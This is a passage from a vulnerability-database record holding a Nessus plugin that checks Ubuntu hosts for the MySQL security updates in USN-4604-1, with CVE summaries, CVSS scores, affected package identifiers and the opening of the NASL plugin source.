vulnerability can result in unauthorized update, insert or delete access to some of MySQL Cluster\n accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL\n Cluster. CVSS 3.1 Base Score 4.6 (Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L). (CVE-2020-14853)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server\n accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14860)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions\n that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14867)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14869)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: X Plugin). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14870)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Logging). Supported versions\n that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14873)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with access to the physical communication segment attached to the hardware where the\n MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in\n takeover of MySQL Server. CVSS 3.1 Base Score 8.0 (Confidentiality, Integrity and Availability impacts).\n CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). (CVE-2020-14878)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 8.0, "vector": "AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-27T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 : MySQL vulnerabilities (USN-4604-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14837", "CVE-2020-14765", "CVE-2020-14869", "CVE-2020-14777", "CVE-2020-14829", "CVE-2020-14771", "CVE-2020-14866", "CVE-2020-14769", "CVE-2020-14844", "CVE-2020-14800", "CVE-2020-14848", "CVE-2020-14812", "CVE-2020-14845", "CVE-2020-14809", "CVE-2020-14786", "CVE-2020-14760", "CVE-2020-14852", "CVE-2020-14791", "CVE-2019-14775", "CVE-2020-14776", "CVE-2020-14773", "CVE-2020-14861", "CVE-2020-14821", "CVE-2020-14793", "CVE-2020-14891", "CVE-2020-14789", "CVE-2020-14804", "CVE-2020-14775", "CVE-2020-14828", "CVE-2020-14838", "CVE-2020-14830", "CVE-2020-14785", "CVE-2020-14868", "CVE-2020-14888", "CVE-2020-14794", "CVE-2020-14814", "CVE-2020-14893", "CVE-2020-14878", "CVE-2020-14839", "CVE-2020-14860", "CVE-2020-14873", "CVE-2020-14870", "CVE-2020-14836", "CVE-2020-14846", "CVE-2020-14827", "CVE-2020-14853", "CVE-2020-14672", "CVE-2020-14790", "CVE-2020-14867"], "modified": "2020-10-27T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:mysql-server", "p-cpe:/a:canonical:ubuntu_linux:mysql-server-core-8.0", "p-cpe:/a:canonical:ubuntu_linux:libmysqlclient-dev", "p-cpe:/a:canonical:ubuntu_linux:mysql-client", "p-cpe:/a:canonical:ubuntu_linux:mysql-client-5.7", "p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.7", "p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite-5.7", "p-cpe:/a:canonical:ubuntu_linux:mysql-source-8.0", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libmysqlclient21", "p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite-8.0", "p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite", "p-cpe:/a:canonical:ubuntu_linux:libmysqlclient20", "p-cpe:/a:canonical:ubuntu_linux:mysql-common", "p-cpe:/a:canonical:ubuntu_linux:mysql-server-8.0", "cpe:/o:canonical:ubuntu_linux:20.10", "p-cpe:/a:canonical:ubuntu_linux:mysql-source-5.7", "p-cpe:/a:canonical:ubuntu_linux:mysql-client-core-5.7", "p-cpe:/a:canonical:ubuntu_linux:mysql-client-8.0", "p-cpe:/a:canonical:ubuntu_linux:mysql-router", "p-cpe:/a:canonical:ubuntu_linux:libmysqld-dev", "p-cpe:/a:canonical:ubuntu_linux:mysql-client-core-8.0", "p-cpe:/a:canonical:ubuntu_linux:mysql-server-core-5.7"], "id": "UBUNTU_USN-4604-1.NASL", "href": "https://www.tenable.com/plugins/nessus/141937", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4604-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141937);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\n \"CVE-2019-14775\",\n \"CVE-2020-14672\",\n \"CVE-2020-14760\",\n \"CVE-2020-14765\",\n \"CVE-2020-14769\",\n \"CVE-2020-14771\",\n \"CVE-2020-14773\",\n \"CVE-2020-14775\",\n \"CVE-2020-14776\",\n \"CVE-2020-14777\",\n \"CVE-2020-14785\",\n \"CVE-2020-14786\",\n \"CVE-2020-14789\",\n \"CVE-2020-14790\",\n \"CVE-2020-14791\",\n \"CVE-2020-14793\",\n \"CVE-2020-14794\",\n \"CVE-2020-14800\",\n \"CVE-2020-14804\",\n \"CVE-2020-14809\",\n \"CVE-2020-14812\",\n \"CVE-2020-14814\",\n \"CVE-2020-14821\",\n \"CVE-2020-14827\",\n \"CVE-2020-14828\",\n \"CVE-2020-14829\",\n \"CVE-2020-14830\",\n \"CVE-2020-14836\",\n \"CVE-2020-14837\",\n \"CVE-2020-14838\",\n \"CVE-2020-14839\",\n \"CVE-2020-14844\",\n \"CVE-2020-14845\",\n \"CVE-2020-14846\",\n \"CVE-2020-14848\",\n \"CVE-2020-14852\",\n \"CVE-2020-14853\",\n \"CVE-2020-14860\",\n \"CVE-2020-14861\",\n \"CVE-2020-14866\",\n \"CVE-2020-14867\",\n \"CVE-2020-14868\",\n \"CVE-2020-14869\",\n \"CVE-2020-14870\",\n \"CVE-2020-14873\",\n \"CVE-2020-14878\",\n \"CVE-2020-14888\",\n \"CVE-2020-14891\",\n \"CVE-2020-14893\"\n );\n script_xref(name:\"USN\", value:\"4604-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 : MySQL vulnerabilities (USN-4604-1)\");\n script_summary(english:\"Checks the dpkg output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 host has packages installed that are affected by multiple\nvulnerabilities as referenced in the USN-4604-1 advisory.\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported\n versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14672)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 5.7.31 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server\n accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). (CVE-2020-14760)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions\n that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows low privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14765)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows low privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14769)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a\n partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14771)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14773, CVE-2020-14777, CVE-2020-14785,\n CVE-2020-14794, CVE-2020-14809, CVE-2020-14837, CVE-2020-14839, CVE-2020-14845, CVE-2020-14861,\n CVE-2020-14866, CVE-2020-14868, CVE-2020-14888, CVE-2020-14891, CVE-2020-14893)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14775)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14776)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that\n are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with\n network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability\n can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL\n Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14786, CVE-2020-14844)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions\n that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14789)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that\n are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14790)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with\n network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability\n can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server.\n CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14791)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14793)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14800)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14804)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions\n that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14812)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14814)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with\n network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability\n can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL\n Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14821, CVE-2020-14829, CVE-2020-14848)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows low privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data\n or complete access to all MySQL Server accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). (CVE-2020-14827)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity\n and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). (CVE-2020-14828)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14830, CVE-2020-14836, CVE-2020-14846)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server\n accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14838)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Charsets). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14852)\n\n - Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: NDBCluster Plugin).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert or delete access to some of MySQL Cluster\n accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL\n Cluster. CVSS 3.1 Base Score 4.6 (Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L). (CVE-2020-14853)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server\n accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14860)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions\n that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14867)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14869)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: X Plugin). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14870)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Logging). Supported versions\n that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14873)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with access to the physical communication segment attached to the hardware where the\n MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in\n takeover of MySQL Server. CVSS 3.1 Base Score 8.0 (Confidentiality, Integrity and Availability impacts).\n CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). (CVE-2020-14878)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4604-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14878\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqld-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client-5.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client-8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client-core-5.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client-core-8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-router\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-core-5.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-core-8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-source-5.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-source-8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite-5.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite-8.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n 